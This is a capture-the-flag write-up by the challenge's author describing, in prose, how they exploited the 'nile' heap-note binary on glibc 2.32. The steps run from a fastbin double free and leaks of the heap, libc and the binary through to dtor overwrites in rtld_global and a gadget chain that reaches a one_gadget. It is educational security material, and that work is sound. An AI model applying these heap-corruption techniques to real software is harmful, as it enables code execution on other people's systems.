When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)
nile was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.
With adding a fake endorsement we can add 0x30 chunks and adding descriptions will create 0x50 chunks. All chunks are allocated via calloc, so tcache cannot be abused, because calloc will not serve chunks from tcache. So the easy path via tcache poisoning is not feasible :(
Also, since the challenge is using libc-2.32, we have to keep in mind, that we cannot directly use double frees, since tcache will check for that. But we can get around this, by first freeing 7 chunks regularly into tcache. After tcache is filled, the following frees will be handled in main_arena, which enables us to use double free again.
With this, we can start leaking heap values (again, libc-2.32 is used, so heap addresses will be mangled).
One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.
This happens, because the mangled heap address will contain null bytes.
Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.
But while developing the exploit, we don’t want to activate ASLR, so, since we know that the leak will work correctly remote, we can just add a small fix to let our exploit also work locally with ASLR deactivated.
So, when we’re running locally and ASLR is disabled, we just set the value, it “should” be and from here on, we can debug it with and without ASLR the same.
This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.
This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).
We have a double free, but since it’s handled via calloc, the chunks have to be 16 byte aligned and they need to have a correct size (0x50 or 0x30), so we cannot just allocate anywhere…
But let’s start with the obvious things first. We need a libc leak.
For this, it would be useful to free a chunk, that will not be handled as a fastbin, but we can only create 0x30 and 0x50 chunks… Except, when doing an upgrade: This will allocate a 0xc00 chunk on the heap, in which the chunks of the professional plan will be stored.
If we could free this chunk, we would get some main_arena pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.
While preparing the previous heap leak, I also triggered the upgrade functionality. This was done on purpose, since after the leak, we still have a double freed pointer in main_arena and also already having allocated the 0xc00 chunk for the professional plan on the heap.
We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.
After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.
The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.
The next 0x50 allocation will thus serve our fake chunk, with which we can overwrite the first bytes from the pro_plan chunk.
This will put a pointer to the pro_plan itself into the first pro chunk slot, which we could now free to get a free bin on the heap, but this will trigger malloc_consolidate, which will notice, that our chunks are totally messed up and abort.
But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.
Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind, that any allocation will now be served from the freed bin, thus overwriting the pro plan entries itself and also move the libc addresses down the heap.
Allocating 4 0x30 chunks in the unsorted bin with pointers to where the main_arena pointers will be after those allocation will result in a valid pro_plan.
Though every second slot has an invalid buffer, this is not an issue anymore, since the IsFree part of it contains 0x31, so it will be skipped in review (as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.
Now, how to get rip control from here on?
First, I checked, if there were any valid chunk sizes (16 byte-aligned) in libc or ld, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook or free_hook).
But no chance, didn’t find any region, which contained a value, with which we could allocate a 0x50 or 0x30 chunk.
So, after a lot of failed tries, I checked bss to see, if we could somehow do something there.
Also no good chunk sizes there, to for example attack got table… But, can we create a fake chunk anywhere in bss?
Well, we kind of control the current pro count by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan itself.
This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks then in the pro plan, could potentially overwrite a table entry with a heap chunk, from which _dl_fini would then fetch the function to execute, which could lead to rip control.
But, this would also mean, that we need to be able to do a clean exit, since the challenge will call cleanup before exitting, which will try to free all currently allocated chunks (which will most likely fail, after the whole mess we created by now on the heap).
We’ll also need to find a way around that, but let’s keep that for later.
First we’ll need a leak to elf region:
This will create another entry in our freed pro plan, with its buffer pointing to a libc address, that contains a pointer to our elf.
But at the current state, the heap is such a mess, that almost every allocation will go haywire. Thus we also need to put a valid chunksize in our payload to fix the followup fastbin. Otherwise malloc will notice the invalid fastbin and crash.
Allocations and frees really start to get a pain from here on…
With this, we were successful on leaking an address pointing to bss, so we can now prepare putting a fake chunk there.
But trying to use the double free to allocate a chunk onto bss now, triggered again malloc_consolidate and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.
So, let’s first take a detour to repair this…
We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20 and putting valid main_arena pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20 bin, so hopefully, we’re good now.
Now, we can go on with allocating into bss, by first increasing the pro plan counter, so that when our final allocation happens, we’ll have a 0x50 size in it.
Looking good. The next allocation will increase the pro plan counter to 0x50 and then allocate the next chunk at 0x00005555555580c0, which will succeed, since we have a valid chunk size there now.
So, with the next chunk, we’ll be able to overwrite the pro_plan pointer itself. Keep in mind, that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global.
After some experimentation (aka debugging the hell out of _dlfini), the following region looked good
We have to keep in mind, that we have already allocated 0x50 chunks, so when overwriting the pro_plan counter, we want to point it to dest_address-(0x50*0x18), so that the next allocations will be written to dest_address.
We’ll first start putting some placeholder chunks there, which will be needed later (this is the result from hours of fiddling around in
ld, so it’s a bit hard to explain in the right order, but should become clearer later on)
If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we don’t have overwritten any dtors by now. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget.
With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now have to also think about, how we can survice cleanup in order to arrive at _dl_fini at all.
We again trigger a double free, so that we can control, where next allocations will go to. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan again. Then we’ll allocate a dummy chunk to pull in our fake fd into main_arena.
The last description will now overwrite a dtor pointer in rtld_global with 0xfacebabe, which could lead to code execution, if we make it there.
The next allocation, will again overwrite the pro_plan pointer, since we already placed a FD pointing there in main_arena.
We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).
By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8, its size to 0x5555555580c0 and it’s is_freed value to 0x5555555580c0 (which happens to be the pro_plan counter).
This will effectively set the pro_plan_counter to 0. Exactly what we need to fix cleanup.
Finally, time to exit and trigger our chain (and to fix it up).
Since, cleanup is now executed nice and clean, we’ll end up in dl_fini, running into our fake dtors there.
This will now fetch the value from rax+0x8 and add the value at r15 (0x0000555555554000, which is elf base) to it, and then call it.
We previously put 0xfacebabe there, so this would now call 0x55565023fabe. Not quite right, so let’s go back there and fix that value.
Calling 0x7ffffacebabe… Seems, we have rip control, yay…
But wait… None of the one_gadget constraints can be fullfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(
This would have been a good candidate, since r12 is already 0x0, but rdx contains an address, thus we cannot use it (for now…).
Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:
$r15 is pointing to the ld region, we overwrote with our pro plan chunks.
So, yeah, that’s the reason, I put that chunk there previously (hard to explain this whole mess in the right order).
By using the above gadget, we can point rax to our chunk on the heap, and it will then jump to rax+0x8 (which currently is 0xdeadbeef). Not quite there yet, but at least we have one register more containing an address, which is under our control.
Still, we just went from one crash to another…
But, we can now branch into another gadget:
When executing this
This will now move the value from rbx+0x40 (0x0) into rdx and then call rax+0x70. So, this will effectively zero out rdx and we fulfilled the constraints for the one_gadget from above (r12 == 0 & rdx == 0).
Remember, that I put the one_gadget address previously in one of the fake chunks? Surprise, it’s now exactly at rax+0x70…
Finally at the end of the journey :)
Phew, this challenge took a lot of time, going down so many rabbit holes, redoing the code execution part again and again. Though, I was cursing a LOT in the middle of the night, I enjoyed the challenge quite a lot in hindsight.
Still, quite curious for other peoples solution, to see, if it can be solved in an easier way, since this one was definitely a real pain.